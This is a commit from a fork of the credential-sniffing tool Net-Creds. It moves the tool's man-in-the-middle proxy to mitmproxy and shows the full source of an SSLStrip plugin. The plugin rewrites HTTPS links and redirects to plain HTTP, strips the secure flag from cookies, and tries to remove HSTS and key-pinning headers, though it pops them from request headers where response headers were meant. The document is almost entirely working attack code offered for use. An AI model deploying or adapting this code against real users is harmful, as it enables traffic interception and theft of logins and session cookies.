Initial commit for v1.0 using mitmproxy instead of twisted

Added a plugin system to Net-Creds so you can now add your own parsers, api hook names might change between now and the offcial release (will submit a PR to the original repo once completed) The main MITM HTTP Proxy now uses mitmproxy which is a big deal, cuts the code down by an insane amount, no more twisted! yay! Basic plugin have been re-wrote for the new proxy engine Since we are using mitmproxy we have out of the box support for SSL/TLS!
2025-07-07 13:32:18 -07:00 · 2016-02-06 13:27:08 -07:00 · 2016-02-06 13:27:08 -07:00 · eea5f53be2
commit eea5f53be2
50 changed files with 5525 additions and 0 deletions
--- a/plugins/sslstrip.py
+++ b/plugins/sslstrip.py
@ -0,0 +1,46 @@
+import re
+from plugins.plugin import Plugin
+from netlib.http import decoded
+from six.moves import urllib
+
+class SSLStrip(Plugin):
+    name = 'SSLStrip'
+    optname = 'sslstrip'
+    desc = 'Performs SSLStripping attacks on requested pages'
+    version = '1.0'
+
+    def initialize(self, context):
+        #set of SSL/TLS capable hosts
+        context.secure_hosts = set()
+
+    def request(self, context, flow):
+
+        flow.request.headers.pop('If-Modified-Since', None)
+        flow.request.headers.pop('Cache-Control', None)
+
+        #proxy connections to SSL-enabled hosts
+        if flow.request.pretty_host in context.secure_hosts :
+            flow.request.scheme = 'https'
+            flow.request.port = 443
+
+    def response(self, context, flow):
+
+        with decoded(flow.response) :
+            flow.request.headers.pop('Strict-Transport-Security', None)
+            flow.request.headers.pop('Public-Key-Pins', None)
+
+            #strip links in response body
+            flow.response.content = flow.response.content.replace('https://', 'http://')
+
+            #strip links in 'Location' header
+            if flow.response.headers.get('Location','').startswith('https://'):
+                location = flow.response.headers['Location']
+                hostname = urllib.parse.urlparse(location).hostname
+                if hostname:
+                    context.secure_hosts.add(hostname)
+                flow.response.headers['Location'] = location.replace('https://', 'http://', 1)
+
+            #strip secure flag from 'Set-Cookie' headers
+            cookies = flow.response.headers.get_all('Set-Cookie')
+            cookies = [re.sub(r';\s*secure\s*', '', s) for s in cookies]
+            flow.response.headers.set_all('Set-Cookie', cookies)